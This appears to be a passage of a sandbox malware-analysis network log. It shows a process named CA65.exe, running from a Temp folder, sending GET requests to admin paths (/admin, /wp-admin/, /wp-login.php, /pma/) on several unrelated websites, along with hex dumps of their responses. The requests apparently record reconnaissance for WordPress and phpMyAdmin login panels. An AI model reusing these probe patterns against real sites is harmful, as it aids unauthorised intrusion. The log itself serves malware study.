window.SiteEnvironment = "production"; window.SiteGroup = "thenil
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 3b 70 72 69 6f 72 69 74 79 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 69 6e 74 6c 5f 66 72 6f 6d 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 69 6e 74 6c 5f 74 6f 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 65 78 63 6c 75 64 65 26 71 75 6f 74 3b 3a 5b 26 71 75 6f 74 3b 4e 5a 26 71 75 6f 74 3b 5d 2c 26 71 75 6f 74 3b 7a 6f 6e 65 73 26 71 75 6f 74 3b 3a 74 72 75 65 7d 2c 26 71 75 6f 74 3b 7a 6f 6e 65 73 26 71 75 6f 74 3b 3a 5b 26 71 75 6f 74 3b 41 55 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4e 5a 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 5d 2c 26 71 75 6f 74 3b 70 72 69 6f 72 69 74 79 26 71 75 6f 74 3b 3a 5b 26 71 75 6f 74 3b 41 55 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4e 5a 26 71 75 6f 74 3b 2c 26 71 Data Ascii: ;priority":true,"intl_from":false,"intl_to":false,"exclude":["NZ"],"zones":true},"zones":["AU","NZ","US"],"priority":["AU","NZ",&q
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 6e 7a 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 2e 6e 7a 2f 61 64 6d 69 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 75 68 70 34 61 63 62 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 64 6e 2f 39 36 33 2d 66 62 63 38 2f 61 73 73 65 74 73 2f 74 68 65 6e 69 6c 65 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 64 6e 2f 39 36 33 2d 66 Data Ascii: /><link rel="alternate" hreflang="en-nz" href="https://www.thenile.co.nz/admin" /><link rel="stylesheet" href="https://use.typekit.net/uhp4acb.css"><link rel="stylesheet" href="/cdn/963-fbc8/assets/thenile.css"><link rel="stylesheet" href="/cdn/963-f
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 3d 22 30 20 30 20 37 30 35 20 32 34 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 30 20 31 30 68 36 34 30 63 31 32 2e 32 20 30 20 32 33 2e 39 20 34 2e 38 34 36 34 20 33 32 2e 35 32 37 20 31 33 2e 34 37 33 31 43 36 39 31 2e 31 35 34 20 33 32 2e 30 39 39 38 20 36 39 36 20 34 33 2e 38 20 36 39 36 20 35 36 76 31 33 34 63 30 20 31 32 2e 32 2d 34 2e 38 34 36 20 32 33 2e 39 2d 31 33 2e 34 37 33 20 33 32 2e 35 32 37 43 36 37 33 2e 39 20 32 33 31 2e 31 35 34 20 36 36 32 2e 32 20 32 33 36 20 36 35 30 20 32 33 36 48 31 30 56 31 30 7a 22 20 73 74 72 6f 6b 65 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 72 6f 6b 65 2d 77 Data Ascii: ="0 0 705 245" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M10 10h640c12.2 0 23.9 4.8464 32.527 13.4731C691.154 32.0998 696 43.8 696 56v134c0 12.2-4.846 23.9-13.473 32.527C673.9 231.154 662.2 236 650 236H10V10z" stroke="currentColor" stroke-w
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 3d 22 33 30 36 22 20 79 3d 22 36 37 22 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 38 37 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 30 20 36 37 63 2d 37 20 39 2e 30 38 30 32 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 73 34 20 31 2e 30 30 38 39 20 37 20 31 2e 30 30 38 39 63 30 20 30 2d 35 2e 35 20 37 2e 35 36 36 38 2d 31 34 20 31 30 2e 35 39 33 35 20 30 20 30 20 38 2e 35 20 32 2e 35 32 32 33 20 31 30 2e 35 20 32 2e 30 31 37 38 20 30 20 30 2d 38 20 31 30 2e 32 36 34 2d 31 36 2e 35 20 31 33 2e 37 36 34 20 30 20 30 20 36 2e 35 20 33 2e 33 38 37 20 39 2e 35 20 33 2e 33 38 37 20 30 20 30 2d 38 20 31 32 2e 31 30 37 2d 31 39 2e 35 20 31 35 2e 31 33 34 Data Ascii: s="userSpaceOnUse" x="306" y="67" width="88" height="87"><path d="M350 67c-7 9.0802-13.5 13.1158-13.5 13.1158s4 1.0089 7 1.0089c0 0-5.5 7.5668-14 10.5935 0 0 8.5 2.5223 10.5 2.0178 0 0-8 10.264-16.5 13.764 0 0 6.5 3.387 9.5 3.387 0 0-8 12.107-19.5 15.134
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 69 6c 6c 3d 22 23 46 46 44 36 30 30 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 30 20 34 38 2e 36 31 38 6c 32 2e 38 39 32 20 38 2e 39 30 31 33 2e 31 31 32 2e 33 34 35 34 68 39 2e 37 32 33 6c 2d 37 2e 35 37 32 20 35 2e 35 30 31 33 2d 2e 32 39 34 2e 32 31 33 35 2e 31 31 33 2e 33 34 35 35 20 32 2e 38 39 32 20 38 2e 39 30 31 32 2d 37 2e 35 37 32 2d 35 2e 35 30 31 32 2d 2e 32 39 34 2d 2e 32 31 33 35 2d 2e 32 39 34 2e 32 31 33 35 2d 37 2e 35 37 32 20 35 2e 35 30 31 32 20 32 2e 38 39 32 2d 38 2e 39 30 31 32 2e 31 31 33 2d 2e 33 34 35 35 2d 2e 32 39 34 2d 2e 32 31 33 35 2d 37 2e 35 37 32 2d 35 2e 35 30 31 33 68 39 2e 37 32 33 6c 2e 31 31 32 2d 2e 33 34 35 34 4c 33 35 30 20 34 38 2e 36 31 38 7a 22 20 73 74 72 6f 6b 65 3d 22 23 46 39 43 32 30 30 22 20 2f 3e Data Ascii: ill="#FFD600" /><path d="M350 48.618l2.892 8.9013.112.3454h9.723l-7.572 5.5013-.294.2135.113.3455 2.892 8.9012-7.572-5.5012-.294-.2135-.294.2135-7.572 5.5012 2.892-8.9012.113-.3455-.294-.2135-7.572-5.5013h9.723l.112-.3454L350 48.618z" stroke="#F9C200" />
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 42 39 31 34 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 36 37 31 34 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 33 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 34 35 2e 37 35 22 20 79 31 3d 22 38 34 2e 35 22 20 78 32 3d 22 33 34 35 2e 37 35 22 20 79 32 3d 22 39 30 2e 35 39 31 38 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 42 39 31 34 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 Data Ascii: paceOnUse"><stop stop-color="#FAB914" /><stop offset="1" stop-color="#FA6714" /></linearGradient><linearGradient id="paint3_linear" x1="345.75" y1="84.5" x2="345.75" y2="90.5918" gradientUnits="userSpaceOnUse"><stop stop-color="#FAB914" /><stop offs
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 30 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 37 30 22 20 79 31 3d 22 39 34 22 20 78 32 3d 22 33 37 30 22 20 79 32 3d 22 39 38 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f Data Ascii: entUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint10_linear" x1="370" y1="94" x2="370" y2="98" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop o
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 37 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 39 33 22 20 79 31 3d 22 31 35 30 22 20 78 32 3d 22 33 39 33 22 20 79 32 3d 22 31 35 34 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 Data Ascii: se"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint17_linear" x1="393" y1="150" x2="393" y2="154" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 61 64 6f 77 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 3c 2f 66 69 6c 74 65 72 3e 0a 3c 2f 64 65 66 73 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 64 69 75 6d 2d 34 20 73 6d 61 6c 6c 2d 33 20 63 6f 6c 75 6d 6e 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 65 65 2d 73 68 69 70 70 69 6e 67 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 62 61 72 2d 72 69 67 68 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 20 6d 65 6e 75 20 63 61 72 74 2d 6d 65 6e 75 20 73 68 6f 77 2d 66 6f 72 2d 73 6d 61 6c 6c 2d 6f 6e 6c 79 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 43 61 72 74 50 72 65 76 69 65 77 43 74 72 6c 22 3e 0a 3c 6c 69 Data Ascii: adow" result="shape" /></filter></defs></svg></a></div></div><div class="medium-4 small-3 columns"><div class="free-shipping"><div class="top-bar-right"><ul class="dropdown menu cart-menu show-for-small-only" ng-controller="CartPreviewCtrl"><li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
347	192.168.2.4	59123	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:14 UTC	169	OUT	GET /admin HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:14 UTC	1042	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com/wp-admin/ CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Link: <https://cannaclear.com/wp-json/>; rel="https://api.w.org/" Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: WordPress Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=og0igBJ3XuEazBihRFRoj%2FN6hrfufV5LPIcf1eURMvbJHUhJSFiitqOyfMHaKlJMqVhXx0utjbh2l2r%2Ft1hCYb53xvA39lnpweXEU5kWIuODiJBbewJyirdNpAEP%2BLs4cw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b0921cb175c83-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
348	192.168.2.4	59333	216.194.166.146	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:14 UTC	238	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Fadm-works.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: adm-works.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	2399	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:14 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure Set-Cookie: wordpress_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-time-0=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_sec_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_sec_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpressuser_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpresspass_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpressuser_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpresspass_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wp-postpass_6dac49a769480499eff4263d2d84dc72=+; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:15 UTC	112	IN	Data Raw: 36 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 0d 0a Data Ascii: 6a<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=
2023-12-22 20:15:15 UTC	77	IN	Data Raw: 34 37 0d 0a 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 44 4d 20 57 6f 72 6b 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 0d 0a Data Ascii: 47UTF-8" /><title>Log In &lsaquo; ADM Works — WordPress</title>
2023-12-22 20:15:15 UTC	83	IN	Data Raw: 34 64 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 65 27 20 2f 3e 0a 0d 0a Data Ascii: 4d<meta name='robots' content='max-image-preview:large, noindex, noarchive' />
2023-12-22 20:15:15 UTC	136	IN	Data Raw: 38 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 64 61 73 68 69 63 6f 6e 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 64 6d 2d 77 6f 72 6b 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 61 73 68 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 0d 0a Data Ascii: 82<link rel='stylesheet' id='dashicons-css' href='https://adm-works.com/wp-includes/css/dashicons.min.css?ver=6.4.2' media='all' />
2023-12-22 20:15:15 UTC	132	IN	Data Raw: 37 65 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 62 75 74 74 6f 6e 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 64 6d 2d 77 6f 72 6b 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 62 75 74 74 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 0d 0a Data Ascii: 7e<link rel='stylesheet' id='buttons-css' href='https://adm-works.com/wp-includes/css/buttons.min.css?ver=6.4.2' media='all' />
2023-12-22 20:15:15 UTC	125	IN	Data Raw: 37 37 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 64 6d 2d 77 6f 72 6b 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 0d 0a Data Ascii: 77<link rel='stylesheet' id='forms-css' href='https://adm-works.com/wp-admin/css/forms.min.css?ver=6.4.2' media='all' />
2023-12-22 20:15:15 UTC	123	IN	Data Raw: 37 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 64 6d 2d 77 6f 72 6b 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 0d 0a Data Ascii: 75<link rel='stylesheet' id='l10n-css' href='https://adm-works.com/wp-admin/css/l10n.min.css?ver=6.4.2' media='all' />
2023-12-22 20:15:15 UTC	125	IN	Data Raw: 37 37 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 64 6d 2d 77 6f 72 6b 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 0d 0a Data Ascii: 77<link rel='stylesheet' id='login-css' href='https://adm-works.com/wp-admin/css/login.min.css?ver=6.4.2' media='all' />
2023-12-22 20:15:15 UTC	198	IN	Data Raw: 63 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6c 61 72 2d 6c 6f 67 69 6e 2d 70 61 67 65 2d 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 64 6d 2d 77 6f 72 6b 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6c 69 6d 69 74 2d 6c 6f 67 69 6e 2d 61 74 74 65 6d 70 74 73 2d 72 65 6c 6f 61 64 65 64 2f 61 73 73 65 74 73 2f 63 73 73 2f 6c 6f 67 69 6e 2d 70 61 67 65 2d 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 32 2e 32 33 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 0d 0a Data Ascii: c0<link rel='stylesheet' id='llar-login-page-styles-css' href='https://adm-works.com/wp-content/plugins/limit-login-attempts-reloaded/assets/css/login-page-styles.css?ver=2.23.2' media='all' />
2023-12-22 20:15:15 UTC	192	IN	Data Raw: 62 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 63 75 73 74 5f 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 64 6d 2d 77 6f 72 6b 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6c 6f 67 69 6e 2d 63 75 73 74 6f 6d 69 7a 65 72 2f 73 72 63 2f 43 75 73 74 6f 6d 69 7a 65 72 2f 50 61 6e 65 6c 2f 41 73 73 65 74 73 2f 43 53 53 2f 63 75 73 74 6f 6d 69 7a 65 72 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 0d 0a Data Ascii: ba<link rel='stylesheet' id='logincust_styles-css' href='https://adm-works.com/wp-content/plugins/login-customizer/src/Customizer/Panel/Assets/CSS/customizer.css?ver=6.4.2' media='all' />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
349	192.168.2.4	59515	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:14 UTC	173	OUT	GET /wp-admin/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	1044	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com/wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: WordPress Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0hpIjxSeIBqZcaw%2FdwkU1mTaLuR%2BaCnA0LO6wOWH0zwF0vzRVOgo5dUxxO5hXZzEhBTn4adglIR2ux3FjiHadENk87J8%2FTSiRBDaam9ykL4uw8hH%2Bbd0iGh3i7UMvnlUaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b09277aa425a6-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
350	192.168.2.4	59509	64.68.191.221	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	174	OUT	GET /pma/ HTTP/1.1 Host: www.adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
